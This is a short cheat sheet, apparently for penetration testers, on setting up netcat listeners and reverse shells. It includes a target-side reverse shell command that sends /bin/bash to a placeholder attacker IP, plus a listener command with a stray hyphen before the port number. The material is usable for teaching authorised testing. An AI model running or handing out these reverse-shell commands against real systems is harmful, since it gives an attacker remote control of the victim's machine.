Netcat - Listeners & Reverse Shells

Set up listeners and receive shells.

nc -nvlp -1337

Open a TCP listener on port 1337 (no DNS resolution).

ss -tlnp | grep 1337

Verifying if listeners are active and what process is bound to port 1337.

nc -e /bin/bash <attacker_IP> 1337

Simple reverse shell (target side). Only use on authorised systems.

  • You can change the port from 1337 to any port of your choice, if open.

  • You can also leverage Reverse Shell Generator to complete a successful reverse shell.